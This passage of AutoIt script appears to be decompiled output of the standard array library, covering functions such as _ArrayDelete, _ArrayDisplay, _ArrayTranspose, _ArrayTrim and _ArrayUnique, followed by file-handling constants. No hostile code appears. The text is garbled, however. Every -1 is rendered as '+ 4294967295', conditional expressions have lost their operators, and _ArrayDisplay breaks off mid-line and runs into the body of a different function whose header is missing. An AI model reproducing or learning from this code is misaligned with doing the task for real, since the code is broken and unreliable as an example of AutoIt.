UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYDELETE (BYREF $AARRAY , $VRANGE ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND 
($AARRAY , $UBOUND_ROWS ) + 4294967295 IF ISARRAY ($VRANGE ) THEN IF UBOUND ($VRANGE , $UBOUND_DIMENSIONS ) <> 1 OR UBOUND ($VRANGE , $UBOUND_ROWS ) < 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE LOCAL $INUMBER , $ASPLIT_1 , $ASPLIT_2 $VRANGE = STRINGSTRIPWS ($VRANGE , 8 ) $ASPLIT_1 = STRINGSPLIT ($VRANGE , ";" ) $VRANGE = "" FOR $I = 1 TO $ASPLIT_1 [0 ] IF NOT STRINGREGEXP ($ASPLIT_1 [$I ] , "^\d+(-\d+)?$" ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , "-" ) SWITCH $ASPLIT_2 [0 ] CASE 1 $VRANGE &= $ASPLIT_2 [1 ] & ";" CASE 2 IF NUMBER ($ASPLIT_2 [2 ] ) >= NUMBER ($ASPLIT_2 [1 ] ) THEN $INUMBER = $ASPLIT_2 [1 ] + 4294967295 DO $INUMBER += 1 $VRANGE &= $INUMBER & ";" UNTIL $INUMBER = $ASPLIT_2 [2 ] ENDIF ENDSWITCH NEXT $VRANGE = STRINGSPLIT (STRINGTRIMRIGHT ($VRANGE , 1 ) , ";" ) ENDIF IF $VRANGE [1 ] < 0 OR $VRANGE [$VRANGE [0 ] ] > $IDIM_1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $ICOPYTO_INDEX = 0 SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROM_INDEX ] ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] [0 ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] [0 ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN FOR $J = 0 TO $IDIM_2 $AARRAY [$ICOPYTO_INDEX ] [$J ] = $AARRAY [$IREADFROM_INDEX ] [$J ] NEXT ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] [$IDIM_2 + 1 ] CASE ELSE RETURN SETERROR (2 , 0 , FALSE ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) ENDFUNC FUNC 
_ARRAYDISPLAY (CONST BYREF $AARRAY , $STITLE = DEFAULT , $SARRAYRANGE = DEFAULT , $IFLAGS = DEFAULT , $VUSER_SEPARATOR = DEFAULT , $SHEADER = DEFAULT , $IMAX_COLWIDTH = DEFAULT , $IALT_COLOR = DEFAULT , $HUSER_FUNCTION = DEFAULT ) IF $STITLE = DEFAULT THEN $STITLE = "ArrayDisplay" IF $SARRAYRANGE = DEFAULT THEN $SARRAYRANGE = "" IF $IFLAGS = DEFAULT THEN $IFLAGS = 0 IF $VUSER_SEPARATOR = DEFAULT THEN $VUSER_SEPARATOR = "" IF $SHEADER = DEFAULT THEN $SHEADER = "" IF $IMAX_COLWIDTH = DEFAULT THEN $IMAX_COLWIDTH = 350 IF $IALT_COLOR = DEFAULT THEN $IALT_COLOR = 0 IF $HUSER_FUNCTION = DEFAULT THEN $HUSER_FUNCTION = 0 LOCAL $ITRANSPOSE = BITAND ($IFLAGS , 1 ) LOCAL $ICOLALIGN = BITAND ($IFLAGS , 6 ) LOCAL $IVERBOSE = BITAND ($IFLAGS , 8 ) LOCAL $IBUTTONMARGIN = ((BITAND ($IFLAGS , 32 ) ) (0 ) ((BITAND ($IFLAGS , 16 ) ) (20 ) (40 ) ) ) LOCAL $INOROW = BITAND ($IFLAGS , 64 ) LOCAL $SMSG = "" , $IRET = 1 IF ISARRAY ($AARRAY ) THEN LOCAL $IDIMENSION = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $IROWCOUNT = UBOUND ($AARRAY , $UBOUND_ROWS ) , $ICOLCOUNT = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMENSION > 2 THEN $SMSG = "Larger than 2D array passed to function" $IRET = 2 ENDIF ELSE $SMSG = "No array variable passed to function" ENDIF IF $SMSG THEN IF $IVERBOSE AND MSGBOX ($MB_SYSTEMMODAL + $MB_ICONERROR + $MB_YESNO , "ArrayDisplay Error: " & $STITLE , $SMSG & @CRLF & @CRLF & "Exit the script?" 
) = $IDYES THEN EXIT ELSE RETURN SETERROR ($IRET , 0 , "" ) ENDIF ENDIF LOCAL $ICW_COLWIDTH = NUMBER ($VUSER_SEPARATOR ) LOCAL $SAD_SEPARATOR = CHRW (64177 ) LOCAL $SCURR_SEPARATOR = OPT ("GUIDataSeparatorChar" , $SAD_SEPARATOR ) IF $VUSER_SEPARATOR = "" THEN $VUSER_SEPARATOR = $SCURR_SEPARATOR LOCAL $VTMP , $IROWLIMIT = 65525 , $ICOLLIMIT = 250 LOCAL $IDATAROW = $IROWCOUNT LOCAL $IDATACOL = $ICOLCOUNT LOCAL $IITEM_START = 0 , $IITEM_END = $IROWCOUNT + 4294967295 , $ISUBITEM_START = 0 , $ISUBITEM_END = (($IDIMENSION = 2 ) ($ICOLCOUNT + 4294967295 ) (0 ) ) LOCAL $BRANGE_FLAG = FALSE , $AVRANGESPLIT IF $SARRAYRANGE THEN LOCAL $AARRAY_RANGE = STRINGREGEXP ($SARRAYRANGE & "||" , "(?U)(.*)\|" , 3 ) IF $AARRAY_RANGE [0 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [0 ] , ":" ) IF @ERROR THEN $IITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $IITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $IITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF ENDIF IF $IITEM_START > $IITEM_END THEN $VTMP = $IITEM_START $IITEM_START = $IITEM_END $IITEM_END = $VTMP ENDIF IF $IITEM_START < 0 THEN $IITEM_START = 0 IF $IITEM_END > $IROWCOUNT + 4294967295 THEN $IITEM_END = $IROWCOUNT + 4294967295 IF $IITEM_START <> 0 OR $IITEM_END <> $IROWCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE IF $IDIMENSION = 2 AND $AARRAY_RANGE [1 ] THEN $AVRANGESPLIT = STRINGSPLIT ($AARRAY_RANGE [1 ] , ":" ) IF @ERROR THEN $ISUBITEM_END = NUMBER ($AVRANGESPLIT [1 ] ) ELSE $ISUBITEM_START = NUMBER ($AVRANGESPLIT [1 ] ) $ISUBITEM_END = NUMBER ($AVRANGESPLIT [2 ] ) ENDIF IF $ISUBITEM_START > $ISUBITEM_END THEN $VTMP = $ISUBITEM_START $ISUBITEM_START = $ISUBITEM_END $ISUBITEM_END = $VTMP ENDIF IF $ISUBITEM_START < 0 THEN $ISUBITEM_START = 0 IF $ISUBITEM_END > $ICOLCOUNT + 4294967295 THEN $ISUBITEM_END = $ICOLCOUNT + 4294967295 IF $ISUBITEM_START <> 0 OR $ISUBITEM_END <> $ICOLCOUNT + 4294967295 THEN $BRANGE_FLAG = TRUE ENDIF ENDIF LOCAL $SDISPLAYDATA = "[" & $IDATAROW LOCAL $BTRUNCATED = FALSE IF $ITRANSPOSE THEN IF $IITEM_END - 
$IITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $ICOLLIMIT + 4294967295 ENDIF ELSE IF $IITEM_END - $IITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $IITEM_END = $IITEM_START + $IROWLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF IF $IDIMENSION = 2 THEN $SDISPLAYDATA &= " [" & $IDATACOL IF $ITRANSPOSE THEN IF $ISUBITEM_END - $ISUBITEM_START > $IROWLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $IROWLIMIT + 4294967295 ENDIF ELSE IF $ISUBITEM_END - $ISUBITEM_START > $ICOLLIMIT THEN $BTRUNCATED = TRUE $ISUBITEM_END = $ISUBITEM_START + $ICOLLIMIT + 4294967295 ENDIF ENDIF IF $BTRUNCATED THEN $SDISPLAYDATA &= "*]" ELSE $SDISPLAYDATA &= "]" ENDIF ENDIF LOCAL $STIPDATA = "" IF $BTRUNCATED THEN $STIPDATA &= "Truncated" IF $BRANGE_FLAG THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Range set" ENDIF IF $ITRANSPOSE THEN IF $STIPDATA THEN $STIPDATA &= " - " $STIPDATA &= "Transposed" ENDIF LOCAL $ASHEADER = STRINGSPLIT ($SHEADER , $SCURR_SEPARATOR , $STR_NOCOUNT ) IF UBOUND ($ASHEADER ) = 0 THEN LOCAL $ASHEADER [1 ] = ["" ] $SHEADER = "Row" LOCAL $IINDEX = $ISUBITEM_START IF $ITRANSPOSE THEN FOR $J = $IITEM_START TO $IITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ELSE IF $ASHEADER [0 ] THEN FOR $IINDEX = $ISUBITEM_START TO $ISUBITEM_END IF $IINDEX >= UBOUND ($ASHEADER ) THEN EXITLOOP $SHEADER &= $SAD_SEPARATOR & $ASHEADER [$IINDEX ] NEXT ENDIF FOR $J = $IINDEX TO $ISUBITEM_END $SHEADER &= $SAD_SEPARATOR & "Col " & $J NEXT ENDIF IF $INOROW THEN $SHEADER = STRINGTRIMLEFT ($SHEADER , 4 ) IF $IVERBOSE AND ($IITEM_END - $IITEM_START + 1 ) * ($ISUBITEM_END - $ISUBITEM_START + 1 ) > 10000 THEN SPLASHTEXTON ("ArrayDisplay" , "Preparing display" & @CRLF & @CRLF & "Please be patient" , 300 , 100 ) ENDIF LOCAL $IBUFFER = 4094 IF $ITRANSPOSE THEN $VTMP = $IITEM_START $IITEM_START = $ISUBITEM_START $ISUBITEM_START = $VTMP $VTMP = $IITEM_END $IITEM_END = $ISUBITEM_END 
4294967295 IF $IEND_COL = DEFAULT THEN $IEND_COL = + 4294967295 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $ISTART_ROW = + 4294967295 THEN $ISTART_ROW = 0 IF $IEND_ROW = + 4294967295 THEN $IEND_ROW = $IDIM_1 IF $ISTART_ROW < + 4294967295 OR $IEND_ROW < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART_ROW > $IDIM_1 OR $IEND_ROW > $IDIM_1 THEN RETURN SETERROR (3 , 0 , "" ) IF $ISTART_ROW > $IEND_ROW THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $SRET = "" SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = $ISTART_ROW TO $IEND_ROW $SRET &= $AARRAY [$I ] & $SDELIM_COL NEXT RETURN STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_COL ) ) CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISTART_COL = + 4294967295 THEN $ISTART_COL = 0 IF $IEND_COL = + 4294967295 THEN $IEND_COL = $IDIM_2 IF $ISTART_COL < + 4294967295 OR $IEND_COL < + 4294967295 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IDIM_2 OR $IEND_COL > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $ISTART_COL > $IEND_COL THEN RETURN SETERROR (6 , 0 , + 4294967295 ) FOR $I = $ISTART_ROW TO $IEND_ROW FOR $J = $ISTART_COL TO $IEND_COL $SRET &= $AARRAY [$I ] [$J ] & $SDELIM_COL NEXT $SRET = STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_COL ) ) & $SDELIM_ROW NEXT RETURN STRINGTRIMRIGHT ($SRET , STRINGLEN ($SDELIM_ROW ) ) CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTRANSPOSE (BYREF $AARRAY ) SWITCH UBOUND ($AARRAY , 0 ) CASE 0 RETURN SETERROR (2 , 0 , 0 ) CASE 1 LOCAL $ATEMP [1 ] [UBOUND ($AARRAY ) ] FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $ATEMP [0 ] [$I ] = $AARRAY [$I ] NEXT $AARRAY = $ATEMP CASE 2 LOCAL $IDIM_1 = UBOUND ($AARRAY , 1 ) , $IDIM_2 = UBOUND ($AARRAY , 2 ) IF $IDIM_1 <> $IDIM_2 THEN LOCAL $ATEMP [$IDIM_2 ] [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 
$ATEMP [$J ] [$I ] = $AARRAY [$I ] [$J ] NEXT NEXT $AARRAY = $ATEMP ELSE LOCAL $VELEMENT FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $I + 1 TO $IDIM_2 + 4294967295 $VELEMENT = $AARRAY [$I ] [$J ] $AARRAY [$I ] [$J ] = $AARRAY [$J ] [$I ] $AARRAY [$J ] [$I ] = $VELEMENT NEXT NEXT ENDIF CASE ELSE RETURN SETERROR (1 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYTRIM (BYREF $AARRAY , $ITRIMNUM , $IDIRECTION = 0 , $ISTART = 0 , $IEND = 0 , $ISUBITEM = 0 ) IF $IDIRECTION = DEFAULT THEN $IDIRECTION = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF $IEND = 0 THEN $IEND = $IDIM_1 IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART < 0 OR $IEND < 0 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IDIRECTION THEN FOR $I = $ISTART TO $IEND $AARRAY [$I ] = STRINGTRIMRIGHT ($AARRAY [$I ] , $ITRIMNUM ) NEXT ELSE FOR $I = $ISTART TO $IEND $AARRAY [$I ] = STRINGTRIMLEFT ($AARRAY [$I ] , $ITRIMNUM ) NEXT ENDIF CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ISUBITEM < 0 OR $ISUBITEM > $IDIM_2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) IF $IDIRECTION THEN FOR $I = $ISTART TO $IEND $AARRAY [$I ] [$ISUBITEM ] = STRINGTRIMRIGHT ($AARRAY [$I ] [$ISUBITEM ] , $ITRIMNUM ) NEXT ELSE FOR $I = $ISTART TO $IEND $AARRAY [$I ] [$ISUBITEM ] = STRINGTRIMLEFT ($AARRAY [$I ] [$ISUBITEM ] , $ITRIMNUM ) NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , 0 ) ENDSWITCH RETURN 1 ENDFUNC FUNC _ARRAYUNIQUE (CONST BYREF $AARRAY , $ICOLUMN = 0 , $IBASE = 0 , $ICASE = 0 , $ICOUNT = $ARRAYUNIQUE_COUNT , $IINTTYPE = $ARRAYUNIQUE_AUTO ) IF $ICOLUMN = DEFAULT THEN $ICOLUMN = 0 
IF $IBASE = DEFAULT THEN $IBASE = 0 IF $ICASE = DEFAULT THEN $ICASE = 0 IF $ICOUNT = DEFAULT THEN $ICOUNT = $ARRAYUNIQUE_COUNT IF UBOUND ($AARRAY , $UBOUND_ROWS ) = 0 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IDIMS = UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) , $INUMCOLUMNS = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $IDIMS > 2 THEN RETURN SETERROR (2 , 0 , 0 ) IF $IBASE < 0 OR $IBASE > 1 OR (NOT ISINT ($IBASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICASE < 0 OR $ICASE > 1 OR (NOT ISINT ($ICASE ) ) THEN RETURN SETERROR (3 , 0 , 0 ) IF $ICOUNT < 0 OR $ICOUNT > 1 OR (NOT ISINT ($ICOUNT ) ) THEN RETURN SETERROR (4 , 0 , 0 ) IF $IINTTYPE < 0 OR $IINTTYPE > 4 OR (NOT ISINT ($IINTTYPE ) ) THEN RETURN SETERROR (5 , 0 , 0 ) IF $ICOLUMN < 0 OR ($INUMCOLUMNS = 0 AND $ICOLUMN > 0 ) OR ($INUMCOLUMNS > 0 AND $ICOLUMN >= $INUMCOLUMNS ) THEN RETURN SETERROR (6 , 0 , 0 ) IF $IINTTYPE = $ARRAYUNIQUE_AUTO THEN LOCAL $VFIRSTELEM = (($IDIMS = 1 ) ($AARRAY [$IBASE ] ) ($AARRAY [$ICOLUMN ] [$IBASE ] ) ) IF ISINT ($VFIRSTELEM ) THEN SWITCH VARGETTYPE ($VFIRSTELEM ) CASE "Int32" $IINTTYPE = $ARRAYUNIQUE_FORCE32 CASE "Int64" $IINTTYPE = $ARRAYUNIQUE_FORCE64 ENDSWITCH ELSE $IINTTYPE = $ARRAYUNIQUE_FORCE32 ENDIF ENDIF OBJEVENT ("AutoIt.Error" , "__ArrayUnique_AutoErrFunc" ) LOCAL $ODICTIONARY = OBJCREATE ("Scripting.Dictionary" ) $ODICTIONARY.CompareMode = NUMBER (NOT $ICASE ) LOCAL $VELEM , $STYPE , $VKEY , $BCOMERROR = FALSE FOR $I = $IBASE TO UBOUND ($AARRAY ) + 4294967295 IF $IDIMS = 1 THEN $VELEM = $AARRAY [$I ] ELSE $VELEM = $AARRAY [$I ] [$ICOLUMN ] ENDIF SWITCH $IINTTYPE CASE $ARRAYUNIQUE_FORCE32 $ODICTIONARY.Item ($VELEM ) IF @ERROR THEN $BCOMERROR = TRUE EXITLOOP ENDIF CASE $ARRAYUNIQUE_FORCE64 $STYPE = VARGETTYPE ($VELEM ) IF $STYPE = "Int32" THEN $BCOMERROR = TRUE EXITLOOP ENDIF $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_MATCH $STYPE = VARGETTYPE ($VELEM ) IF STRINGLEFT ($STYPE , 3 ) = 
"Int" THEN $VKEY = "#Int#" & STRING ($VELEM ) ELSE $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) ENDIF IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_DISTINCT $VKEY = "#" & VARGETTYPE ($VELEM ) & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF ENDSWITCH NEXT LOCAL $AVALUES , $J = 0 IF $BCOMERROR THEN RETURN SETERROR (7 , 0 , 0 ) ELSEIF $IINTTYPE <> $ARRAYUNIQUE_FORCE32 THEN LOCAL $AVALUES [$ODICTIONARY.Count ] FOR $VKEY IN $ODICTIONARY.Keys () $AVALUES [$J ] = $ODICTIONARY ($VKEY ) IF STRINGLEFT ($VKEY , 5 ) = "#Ptr#" THEN $AVALUES [$J ] = PTR ($AVALUES [$J ] ) ENDIF $J += 1 NEXT ELSE $AVALUES = $ODICTIONARY.Keys () ENDIF IF $ICOUNT THEN _ARRAYINSERT ($AVALUES , 0 , $ODICTIONARY.Count ) ENDIF RETURN $AVALUES ENDFUNC FUNC _ARRAY1DTOHISTOGRAM ($AARRAY , $ISIZING = 100 ) IF UBOUND ($AARRAY , 0 ) > 1 THEN RETURN SETERROR (1 , 0 , "" ) $ISIZING = $ISIZING * 8 LOCAL $T , $N , $IMIN = 0 , $IMAX = 0 , $IOFFSET = 0 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] $T = ISNUMBER ($T ) ROUND ($T ) 0 IF $T < $IMIN THEN $IMIN = $T IF $T > $IMAX THEN $IMAX = $T NEXT LOCAL $IRANGE = INT (ROUND (($IMAX - $IMIN ) / 8 ) ) * 8 LOCAL $ISPACERATIO = 4 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] IF $T THEN $N = ABS (ROUND (($ISIZING * $T ) / $IRANGE ) / 8 ) $AARRAY [$I ] = "" IF $T > 0 THEN IF $IMIN THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * $IMIN ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I ] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ELSE IF $IMIN <> $T THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * ($T - $IMIN ) ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I ] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ENDIF $AARRAY [$I ] &= __ARRAY_STRINGREPEAT (CHRW (9608 ) , INT ($N / 8 ) ) $N = MOD ($N , 8 ) IF $N > 0 THEN $AARRAY [$I ] &= CHRW (9608 + 8 - $N ) $AARRAY [$I ] &= " " & $T ELSE $AARRAY [$I ] = "" ENDIF NEXT RETURN 
$AARRAY ENDFUNC FUNC __ARRAY_STRINGREPEAT ($SSTRING , $IREPEATCOUNT ) $IREPEATCOUNT = INT ($IREPEATCOUNT ) IF STRINGLEN ($SSTRING ) < 1 OR $IREPEATCOUNT <= 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $SRESULT = "" WHILE $IREPEATCOUNT > 1 IF BITAND ($IREPEATCOUNT , 1 ) THEN $SRESULT &= $SSTRING $SSTRING &= $SSTRING $IREPEATCOUNT = BITSHIFT ($IREPEATCOUNT , 1 ) WEND RETURN $SSTRING & $SRESULT ENDFUNC FUNC __ARRAY_EXETERINTERNAL (BYREF $AARRAY , $ISTART , $ISIZE , $SDELIMITER , BYREF $AIDX , BYREF $ARESULT , BYREF $ICOUNT ) IF $ISTART == $ISIZE + 4294967295 THEN FOR $I = 0 TO $ISIZE + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , STRINGLEN ($SDELIMITER ) ) $ICOUNT += 1 ELSE LOCAL $ITEMP FOR $I = $ISTART TO $ISIZE + 4294967295 $ITEMP = $AIDX [$I ] $AIDX [$I ] = $AIDX [$ISTART ] $AIDX [$ISTART ] = $ITEMP __ARRAY_EXETERINTERNAL ($AARRAY , $ISTART + 1 , $ISIZE , $SDELIMITER , $AIDX , $ARESULT , $ICOUNT ) $AIDX [$ISTART ] = $AIDX [$I ] $AIDX [$I ] = $ITEMP NEXT ENDIF ENDFUNC FUNC __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $I_TOTAL = 1 FOR $I = $IR TO 1 STEP + 4294967295 $I_TOTAL *= ($IN / $I ) $IN -= 1 NEXT RETURN ROUND ($I_TOTAL ) ENDFUNC FUNC __ARRAY_GETNEXT ($IN , $IR , BYREF $ILEFT , $ITOTAL , BYREF $AIDX ) IF $ILEFT == $ITOTAL THEN $ILEFT -= 1 RETURN ENDIF LOCAL $I = $IR + 4294967295 WHILE $AIDX [$I ] == $IN - $IR + $I $I -= 1 WEND $AIDX [$I ] += 1 FOR $J = $I + 1 TO $IR + 4294967295 $AIDX [$J ] = $AIDX [$I ] + $J - $I NEXT $ILEFT -= 1 ENDFUNC FUNC __ARRAY_MINMAXINDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , $FUCOMPARISON ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ICOMPNUMERIC <> 1 THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY 
, $UBOUND_ROWS ) + 4294967295 IF $IDIM_1 < 0 THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF $IEND = + 4294967295 THEN $IEND = $IDIM_1 IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $ISTART < + 4294967295 OR $IEND < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) IF $IDIM_1 < 0 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $IMAXMININDEX = $ISTART SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] , $AARRAY [$IMAXMININDEX ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE 2 IF $ISUBITEM < 0 OR $ISUBITEM > UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] [$ISUBITEM ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] [$ISUBITEM ] , $AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMAXMININDEX ENDFUNC FUNC __ARRAY_GREATERTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 > $VVALUE2 ENDFUNC FUNC __ARRAY_LESSTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 < $VVALUE2 ENDFUNC FUNC __ARRAYUNIQUE_AUTOERRFUNC () ENDFUNC GLOBAL CONST $FC_NOOVERWRITE = 0 GLOBAL CONST $FC_OVERWRITE = 1 GLOBAL CONST $FC_CREATEPATH = 8 GLOBAL CONST $FT_MODIFIED = 0 GLOBAL CONST $FT_CREATED = 1 GLOBAL CONST $FT_ACCESSED = 2 GLOBAL CONST $FT_ARRAY = 0 GLOBAL CONST $FT_STRING = 1 GLOBAL CONST $FSF_CREATEBUTTON = 1 GLOBAL CONST $FSF_NEWDIALOG = 2 GLOBAL CONST $FSF_EDITCONTROL = 4 GLOBAL CONST $FT_NONRECURSIVE = 0 GLOBAL 
CONST $FT_RECURSIVE = 1 GLOBAL CONST $FO_READ = 0 GLOBAL CONST $FO_APPEND = 1 GLOBAL CONST $FO_OVERWRITE = 2 GLOBAL CONST $FO_CREATEPATH = 8 GLOBAL CONST $FO_BINARY = 16 GLOBAL CONST $FO_UNICODE = 32 GLOBAL CONST $FO_UTF16_LE = 32 GLOBAL CONST $FO_UTF16_BE = 64 GLOBAL CONST $FO_UTF8 = 128 GLOBAL CONST $FO_UTF8_NOBOM = 256 GLOBAL CONST $FO_ANSI = 512 GLOBAL CONST $FO_UTF16_LE_NOBOM = 1024 GLOBAL CONST $FO_UTF16_BE_NOBOM = 2048 GLOBAL CONST $FO_UTF8_FULL = 16384 GLOBAL CONST $FO_FULLFILE_DETECT = 16384 GLOBAL CONST $EOF = + 4294967295 GLOBAL CONST $FD_FILEMUSTEXIST = 1 GLOBAL CONST $FD_PATHMUSTEXIST = 2 GLOBAL CONST $FD_MULTISELECT = 4 GLOBAL CONST $FD_PROMPTCREATENEW = 8 GLOBAL CONST 